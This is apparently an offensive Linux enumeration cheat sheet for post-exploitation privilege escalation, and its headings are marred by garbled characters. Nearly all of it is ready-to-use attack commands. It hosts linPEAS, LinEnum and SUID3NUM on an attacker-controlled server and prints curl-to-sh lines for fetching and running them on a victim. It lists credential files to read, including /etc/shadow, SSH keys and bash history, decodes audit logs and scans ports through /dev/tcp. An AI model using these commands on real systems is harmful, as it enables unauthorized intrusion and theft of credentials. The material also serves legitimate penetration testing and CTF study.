π§ Enumο
You donβt have time ?ο
# Serve files with nginx
sudo mkdir /var/www/html/enum/ && sudo service nginx start
# Download scripts
sudo curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /var/www/html/enum/linpeas.sh
sudo curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /var/www/html/enum/LinEnum.sh
sudo curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py -o /var/www/html/enum/suid3num.py
# Print URLs
I="tun0";IP=$(ip -f inet addr show $I|sed -En -e 's/.*inet ([0-9.]+).*/\1/p')
for i in /var/www/html/enum/*.sh;do echo -e "\ncurl \"http://$IP/enum/$(basename $i)\"|sh";done && \
for i in /var/www/html/enum/*.py;do echo -e "\ncurl \"http://$IP/enum/$(basename $i)\"|python";done
#
All in 1 Scriptsο
LinePEASο
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
LinEnumο
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
SUID Enumο
Enum SUID program with python2/3 built-in modules
curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python
Watch Processο
Watch for existing and new process
Interesting Filesο
Publicο
#
/etc/issue
/etc/passwd
/etc/group
Rootο
#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD
/var/spool/cron/crontabs/*
/var/spool/cron/*
Userο
#
/home/*/.bash_history
/home/*/.ssh/*
Auditd (adm)ο
When parsing audit logs you may encounter hex encoded data
for VAR in cmd data ; do
for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
done
done
Scan Portsο
Retrieve hidden ports without scanner/netstat
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null